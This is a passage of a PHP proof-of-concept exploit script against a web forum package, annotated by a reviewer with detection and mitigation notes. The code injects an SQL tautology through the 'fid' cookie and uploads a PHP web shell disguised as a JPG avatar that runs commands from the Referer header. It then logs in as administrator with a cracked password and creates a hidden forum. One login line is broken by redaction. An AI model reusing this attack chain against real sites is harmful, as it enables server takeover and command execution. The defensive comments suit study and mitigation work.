} } } # closing braces for blocks that open before this chunk (not visible here)
# NOTE(review): proof-of-concept exploit fragment against a PHP forum package.
# $vars, $xpl, $url, $owner and $name are defined earlier in the file; $xpl is the
# HTTP helper object (addcookie/cookiejar/formdata/post/get/showcookie/getcontent).
# The salt is read from a value captured earlier ($vars[2][4]) with a fixed fallback;
# the script then pauses until the operator types in the recovered password.
# Weakness relied upon: a constant salt ('atk') means every account shares the same
# DES-crypt salt, so hashes can be precomputed. Application-side fix: per-user random
# salts, i.e. password_hash()/password_verify().
$salt = !empty($vars[2][4]) ? $vars[2][4] : 'atk'; # constant salt, see note above
print "\nsploit> Salt -> {$salt} (Standard DES hash)";
print "\nsploit> Enter the decrypted password to continue: ";
$password = trim(fgets(STDIN));
# The 'fid' cookie carries an SQL tautology, so the target evidently uses this cookie
# unescaped in a query. Detection: cookie values containing SQL keywords/operators.
# Mitigation: parameterised queries and casting the id to int before use.
$xpl->addcookie("fid", "-1 or 1=1");
$xpl->cookiejar(1); # presumably enables cookie persistence across requests - confirm in $xpl
print "status> Uploading a malicious picture";
# Multipart upload declaring type image/jpg and a .jpg filename while the body is a
# PHP web shell (marker 337666733, extract($_SERVER) followed by system($HTTP_REFERER)).
# For this to work the target must accept the client-supplied type/extension and serve
# the upload directory with PHP execution enabled. Detection: uploaded files whose
# content does not match their declared image type; the literal 337666733 and the
# extract($_SERVER)/system() pattern on disk. Mitigation: validate image content
# server-side, store uploads outside the web root, disable script execution there.
# frmdt_* are constants of the HTTP helper library (defined outside this chunk).
$formdata = array(frmdt_url => $url . "?owner={$owner}&action=profile", "email" => "{$name}@hotmail.coum", "url" => "http://", "upload" => array(frmdt_type => "image/jpg", frmdt_filename => "hello.jpg", frmdt_content => "<?php print 337666733;@extract(\$_SERVER);@system(\$HTTP_REFERER);print 337666733;exit(0); ?>"), "avatar" => "./avatar/welcome.jpg");
$xpl->formdata($formdata);
print "\nstatus> Trying to get logged in";
# NOTE(review): the admin login name looks redacted to '******' in this copy, which
# also makes the argument a syntax error as written (string * string); the line is
# preserved verbatim and is not a working statement in this form.
$xpl->post($url . 'myadmin.php?action=login', 'login='******'&passwd=' . $password);
# Login is judged successful when ATK_ADMIN appears in the cookies returned by showcookie().
if (preg_match("#ATK_ADMIN#i", $xpl->showcookie())) { print "\nsploit> Done"; } else { die("\nsploit> Exploit failed"); }
print "\nstatus> Creating a hidden forum";
# Takes the first <option value='...'> of the admin page as the style name,
# falling back to a hard-coded default when none is found.
$xpl->get($url . 'myadmin.php?choix=2');
if (!preg_match("#<option value='(\\S+)'#", $xpl->getcontent(), $styles)) { $styles[1] = "xml_BlueLight"; }
# Both the forum title and its filename are set to $name; the 'filename' field
# presumably ends up as a path on the server - confirm against the target's create handler.
$xpl->post($url . 'myadmin.php?action=create', "title={$name}&filename={$name}&passwd=&style=" . $styles[1] . "&structure=1&subject=");
# Re-read the forum list and keep the last captured hide_forum id as the newly created forum.
$xpl->get($url . 'myadmin.php?choix=1');
if (!preg_match_all("#action=hide_forum&id=([0-9]+)#", $xpl->getcontent(), $fid)) { die("\nsploit> Can't retrieve the forum id"); }
$forumid = $fid[1][count($fid[1]) - 1]; # last id in document order